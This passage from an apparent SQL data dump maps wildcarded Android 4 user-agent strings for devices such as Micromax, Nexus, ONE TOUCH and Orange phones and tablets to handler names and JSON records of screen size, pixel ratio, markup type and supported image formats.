Safari/*','android_mtc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MTC 982O) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mtc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MTN-S620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MX4 Pro) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MediaPad 7 Youth) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; MediaPad T1 8.0 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax A093) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax A104) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax A106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax A190) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax A47) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax A79) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax D303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax D306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax D320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax Q335) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax Q379) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Micromax S302) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; N1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; N5111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; N5116) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; N5206) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; N817) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; NOS NOVU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; NX404H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; NX406E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; NX785QC8G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Neo4.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus 10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus 4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus 5) AppleWebKit/* (KHTML, like Gecko; googleweblight) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":800,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus 7) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nexus S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; NokiaX2DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nokia_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nokia_X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nokia_XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nokia_XL) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Nomi_i503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; O6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; OK-smart8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4014D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4014D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4015A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4015A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4015D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4015D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4015X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4015X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4016A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033E) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 4033X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 6012D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 6012X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONE TOUCH 6012X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ONYX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ORINOQUIA Auyantepui+Y221-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; One ME) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Onyx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange 400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Daytona) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Gova) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Nura) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Reyo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Rise 30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Rono) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Roya) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Sego) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Yomi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Orange Yumo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Outdoor WT4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; P1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; P20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; P4502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; P5Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; P6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; P6Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 